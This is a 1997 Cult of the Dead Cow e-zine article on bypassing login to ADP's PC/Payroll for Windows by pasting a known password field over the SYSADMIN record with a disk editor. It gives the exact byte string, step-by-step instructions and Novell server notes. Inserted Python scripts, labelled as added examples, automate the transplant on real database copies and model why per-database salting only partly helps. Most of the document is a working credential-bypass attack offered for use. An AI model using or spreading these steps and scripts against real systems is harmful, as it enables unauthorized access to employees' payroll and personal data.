Cult of the Dead Cow 340
_
| \
| \
| | \
__ | |\ \ __
_____________ _/_/ | | \ \ _/_/ _____________
| ___________ _/_/ | | \ \ _/_/ ___________ |
| | _/_/_____ | | > > _/_/_____ | |
| | /________/ | | / / /________/ | |
| | | | / / | |
| | | |/ / | |
| | | | / | |
| | | / | |
| | |_/ | |
| | | |
| | c o m m u n i c a t i o n s | |
| |________________________________________________________________| |
|____________________________________________________________________|
...presents... Hacking PC/Payroll for Windows
by Tarkin Darklighter
09/01/1997-#340
__///////\ -cDc- CULT OF THE DEAD COW -cDc- /\\\\\\\__
\\\\\\\/ Everything You Need Since 1986 \///////
___ _ _ ___ _ _ ___ _ _ ___ _ _ ___
|___heal_the_sick___raise_the_dead___cleanse_the_lepers___cast_out_demons___|
I. Introduction
Automatic Data Processing (ADP) is the nation's largest provider of
computerized payroll transaction processing. PC/Payroll for Windows is
ADP's client/server front end for AutoPay, which is in use by over
225,000 clients and 20 million employees (per ADP's 1996 annual report).
With PC/Payroll, you can either connect to a SQL server or use their
run-time SQL server engine to access a local database. Whichever option
the company in question is using, the security is trivial to defeat.
When you execute PC/Payroll, you are asked for a user name and password.
The natural inclination in a case like this is to just "brute force"
your way into the program via a word list. Fortunately, that isn't
necessary: there is a major flaw in the way the database stores its
passwords. The stored form of a password does not depend on which
database file it lives in, so a credential you create in a throwaway
database can be pasted into the real one with a disk editor.
So, let's get to it.
II. Tools
A. PC/Payroll and its configuration
The first thing you'll need is a copy of PC/Payroll for Windows. If you
can't obtain the installation CD, you'll need to copy the \PCPW
directory from the user's hard drive or from the server. Also, be sure
to copy the MFCOLEUI.DLL file from the \WINDOWS\SYSTEM directory, or you
won't be able to execute the program.
The actual payroll database file is usually stored in a subdirectory of
\PCPW. The default directory name is PAY4WIN and the default database
name is PAY4WIN.DBS. This database can get very large, so make sure you
have a lot of storage space available.
There are two INI files in the \PCPW directory that may be important:
SQL.INI and PAY4WIN.INI. Make sure that the entries in these files
point to the correct drive letter and directory on your system.
B. Disk editor
You'll also need a good disk editor to examine the database file. I
prefer Norton Disk Editor (DOS version 8.0), but remember that a lot of
these old editors won't work properly with Windows 95's new FAT32 file
system. You can really screw up your hard drive if you're not careful,
so work on a copy of the database and keep a backup of the original.
III. Methodology
We're going to perform a basic "cut-and-paste" operation on the password
fields in the database. This is easily accomplished by creating a user
with a known password and copying their password field to the SYSADMIN's
password field.
The next question is exactly HOW to create a new user without actually
getting into the program first. Fortunately for us, ADP provides a SQL
database utility that will do just exactly that! We're going to create
a new database and then create a new user/password within that database:
To create a new database:
1. Start up the WINTALK.EXE utility.
2. Select Admin/Install Database.
3. Check the "Local" box.
4. Check the "New" box.
5. The Password field is not important. Just put whatever you want in
here.
6. Type in the name of a new database. (We'll use NEWDB in this
example.)
7. Click OK.
The new database should now be created. If you're having problems,
check the entries in the SQL.INI file.
Now, to create the user and password:
1. Select Session/Connect from within WINTALK.EXE.
2. Select NEWDB from the box on the left and click OK.
3. Select Security/New User from the menu bar.
4. Create a new user named SYSADMIN with DBA privileges and the password
"PASSWORD" (passwords are not case-sensitive), then click OK.
5. Exit WINTALK.
The next step is to copy your new password into the original database
file. Let's take a look at the database:
Open the NEWDB.DBS file with your disk editor and search for the SECOND
instance of SYSADMIN. This is the Master User account that has full
access to everything in PC/Payroll.
The password field is located immediately after the user name: a 10h
byte (16 decimal, matching the length of the field) followed by 16
bytes. In our example above, those 16 bytes should read:
45 45 4B 46 4D 4B 46 48 4D 49 48 47 42 42 48 4B
You should get the same string of bytes if you used a password of
"PASSWORD", no matter which machine or database you created it in. That
is the whole flaw: nothing unique to the database file goes into the
stored password. Write these numbers down.
Now, use your disk editor to open PAY4WIN.DBS. Search for the SECOND
instance of SYSADMIN again and locate the password field. If you can't
find a SYSADMIN user, locate the second instance of another user (like
the name of your payroll clerk) with sufficient privileges in
PC/Payroll.
All you have to do is to overwrite the SYSADMIN's password field with
the 16 bytes you wrote down, starting after the 10h. Overwrite the bytes
in place; do not insert or delete anything, or every offset after the
edit will shift and the database will be corrupted. Save your changes.
Start PAY4WIN.EXE, and log in using SYSADMIN and PASSWORD. You should
have full access. If the login fails, check that you edited the second
occurrence of the name and that the file is still exactly the same size
as before.
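The disk-editor steps above as a script. This is an added example, not part of the cDc article and not ADP's or the SQL engine's code: it finds the SECOND occurrence of the user name, checks that a 10h byte follows it, copies the 16-byte field out of the throwaway database, and overwrites the same field in the target in place so the file length never changes. The .DBS contents it runs on are constructed stand-ins with only the name/10h/16-byte pattern the article describes, not the real file format; the file name PAY4WIN.DBS and the user name SYSADMIN come from the text, and patch_file is for real files once you have copied them.

```python
"""Transplant a stored credential field between two .DBS files.

Added example; the .DBS layouts below are constructed, not the real format.
"""
USER = b"SYSADMIN"
FIELD_LEN = 0x10  # the 10h byte that sits between the name and the field

# The 16 stored bytes the article reports for the password "PASSWORD".
KNOWN_BLOB = bytes.fromhex("45 45 4B 46 4D 4B 46 48 4D 49 48 47 42 42 48 4B")


def nth_occurrence(data: bytes, needle: bytes, n: int) -> int:
    """Offset of the n-th (1-based) occurrence of needle in data, or -1."""
    pos = -1
    for _ in range(n):
        pos = data.find(needle, pos + 1)
        if pos < 0:
            return -1
    return pos


def locate_credential(data: bytes, user: bytes = USER, occurrence: int = 2) -> int:
    """Offset of the 16-byte credential field that follows the user name.

    The article's rule: take the SECOND instance of the name, expect a 10h
    byte right after it, and the field is the 16 bytes after that. Both the
    10h byte and the field length are checked before any offset is trusted,
    so a file with a different layout fails loudly instead of being patched
    in the wrong place.
    """
    name_off = nth_occurrence(data, user, occurrence)
    if name_off < 0:
        raise ValueError(f"occurrence {occurrence} of {user!r} not found")
    len_off = name_off + len(user)
    if len_off >= len(data) or data[len_off] != FIELD_LEN:
        raise ValueError("no 10h byte after the user name; layout differs")
    field_off = len_off + 1
    if field_off + FIELD_LEN > len(data):
        raise ValueError("credential field runs past end of file")
    return field_off


def extract_credential(data: bytes, user: bytes = USER) -> bytes:
    """The 16 bytes you would write down from the throwaway database."""
    off = locate_credential(data, user)
    return data[off:off + FIELD_LEN]


def transplant(source: bytes, target: bytes,
               src_user: bytes = USER, dst_user: bytes = USER) -> bytes:
    """Return target with dst_user's field overwritten by src_user's field
    from source. The 16 bytes are replaced in place, so the file length and
    every other offset stay unchanged, which is what a disk editor in
    overwrite mode does and an insert would not."""
    blob = extract_credential(source, src_user)
    off = locate_credential(target, dst_user)
    return target[:off] + blob + target[off + FIELD_LEN:]


def patch_file(src_path: str, dst_path: str) -> None:
    """Disk-editor step as a script: back up dst_path, then patch it."""
    with open(src_path, "rb") as f:
        source = f.read()
    with open(dst_path, "rb") as f:
        target = f.read()
    with open(dst_path + ".bak", "wb") as f:
        f.write(target)
    with open(dst_path, "wb") as f:
        f.write(transplant(source, target))


def fake_dbs(user: bytes, blob: bytes, filler: bytes) -> bytes:
    """Constructed stand-in for a .DBS file (not the real format). The first
    copy of the name is a decoy with no 10h byte after it; the second copy
    is the Master User record with the 10h byte and the 16-byte field."""
    return (b"\x00" * 8 + user + b"\x00" * 4 + filler
            + user + bytes([FIELD_LEN]) + blob + filler)


# Constructed sample files: NEWDB holds the known "PASSWORD" credential,
# PAY4WIN holds an admin credential whose password we do not know.
NEWDB = fake_dbs(USER, KNOWN_BLOB, b"\x01" * 32)
PAY4WIN = fake_dbs(USER, bytes(range(0x80, 0x90)), b"\x02" * 64)


if __name__ == "__main__":
    patched = transplant(NEWDB, PAY4WIN)
    print("before:", extract_credential(PAY4WIN).hex())
    print("after: ", extract_credential(patched).hex())
```

Run it against real copies with patch_file("NEWDB.DBS", "PAY4WIN.DBS"); the ValueError paths are the same checks you would make by eye in the disk editor (right occurrence of the name, 10h byte present, 16 bytes available), and a layout that does not match leaves the target untouched.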
IV. Additional Notes
This hack has also been proven to work on Novell servers running the SQL
server as an NLM. Just copy the database and log files from the server
to your local machine and proceed as above. Note that you will have to
unload the SQL NLM in order to grab the files, since it keeps them open.
(You can copy them at will if the server is running a utility like St.
Bernard's Open File Manager.)
V. Conclusion
I must admit, this is pretty weak security, especially for something as
important as payroll. Most companies guard their payroll information
VERY closely. There are a lot of ways ADP could have made this more
difficult. Simply encrypting the passwords using a unique number in
each database file would have been enough to make things much more
difficult! Even then, a unique number that is stored in the same file
can be copied over along with the password, so the database file itself
still has to be kept out of reach of anyone who shouldn't be able to log
in.
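A model of why the cut-and-paste works and what the per-database unique number proposed above changes. This is an added example, not from the article and not ADP's code: the real PC/Payroll transform is not reproduced, and stored_unsalted is only a stand-in with the one property the article exploits (the same password always yields the same 16 bytes, whatever file it lives in). stored_salted mixes in a number unique to each database; the salts, user names and the clerk's password are constructed. The last function shows the limit of that fix when the attacker can already write the file.

```python
"""Unsalted vs. per-database-salted credential storage, replaying the attack.

Added example; hashing choices are stand-ins, not PC/Payroll's scheme.
"""
import hashlib
import hmac
from typing import Dict, Optional

FIELD_LEN = 16


def stored_unsalted(password: str) -> bytes:
    """Stand-in for the article's scheme: the stored bytes depend only on the
    (case-folded) password, never on the file they are written into.
    SHA-1 is used only to get a deterministic 16-byte value."""
    return hashlib.sha1(password.upper().encode("ascii")).digest()[:FIELD_LEN]


def stored_salted(salt: bytes, password: str) -> bytes:
    """The conclusion's fix: mix in a number unique to each database file."""
    return hashlib.pbkdf2_hmac("sha256", password.upper().encode("ascii"),
                               salt, 1000, FIELD_LEN)


class Database:
    """A toy security table. salt=None models the unsalted scheme."""

    def __init__(self, salt: Optional[bytes] = None):
        self.salt = salt
        self.records: Dict[str, bytes] = {}

    def _stored(self, password: str) -> bytes:
        if self.salt is None:
            return stored_unsalted(password)
        return stored_salted(self.salt, password)

    def create_user(self, name: str, password: str) -> None:
        self.records[name.upper()] = self._stored(password)

    def login(self, name: str, password: str) -> bool:
        blob = self.records.get(name.upper())
        if blob is None:
            return False
        return hmac.compare_digest(blob, self._stored(password))

    def overwrite_credential(self, name: str, blob: bytes) -> None:
        """What the disk editor does: replace the 16-byte field, nothing else."""
        self.records[name.upper()] = blob


def transplant_attack(salted: bool) -> bool:
    """Replay the article: create SYSADMIN/PASSWORD in a throwaway database,
    paste its field over the victim's SYSADMIN, then try to log in."""
    if salted:
        newdb = Database(salt=b"\x11" * 16)    # constructed unique number
        pay4win = Database(salt=b"\x22" * 16)  # constructed, differs per file
    else:
        newdb, pay4win = Database(), Database()
    newdb.create_user("SYSADMIN", "PASSWORD")
    pay4win.create_user("SYSADMIN", "clerk-chosen-secret")  # unknown to us
    pay4win.overwrite_credential("SYSADMIN", newdb.records["SYSADMIN"])
    return pay4win.login("SYSADMIN", "password")  # not case-sensitive


def transplant_with_salt() -> bool:
    """The caveat: an attacker who can already write the file can copy the
    unique number together with the field, which restores the attack."""
    newdb = Database(salt=b"\x11" * 16)
    pay4win = Database(salt=b"\x22" * 16)
    newdb.create_user("SYSADMIN", "PASSWORD")
    pay4win.create_user("SYSADMIN", "clerk-chosen-secret")
    pay4win.salt = newdb.salt
    pay4win.overwrite_credential("SYSADMIN", newdb.records["SYSADMIN"])
    return pay4win.login("SYSADMIN", "PASSWORD")


if __name__ == "__main__":
    print("unsalted, paste field only:", transplant_attack(salted=False))
    print("salted, paste field only:  ", transplant_attack(salted=True))
    print("salted, paste field + salt:", transplant_with_salt())
```

The salted run fails only because the victim file's unique number differs from the throwaway file's; once both the number and the field are pasted, the login succeeds again. That is the reason the fix raises the bar rather than closing the hole, and why read/write access to PAY4WIN.DBS is the control that actually matters.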
.-. _ _ .-.
/ \ .-. ((___)) .-. / \
/.ooM \ / \ .-. [ x x ] .-. / \ /.ooM \
-/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\-
/lucky 13\ / \ / `-(' ')-' \ / \ /lucky 13\
\ / `-' (U) `-' \ /
`-' the original e-zine `-' _
Oooo eastside westside / ) __
/)(\ ( \ WORLDWIDE / ( / \
\__/ ) / Copyright (c) 1997 cDc communications and the author. \ ) \)(/
(_/ CULT OF THE DEAD COW is a registered trademark of oooO
cDc communications, PO Box 53011, Lubbock, TX, 79453, USA. _
oooO All rights reserved. Edited by Grandmaster Ratte'. __ ( \
/ ) /)(\ / \ ) \
\ ( \__/ Save yourself! Go outside! Do something! \)(/ ( /
\_) xXx BOW to the COW xXx Oooo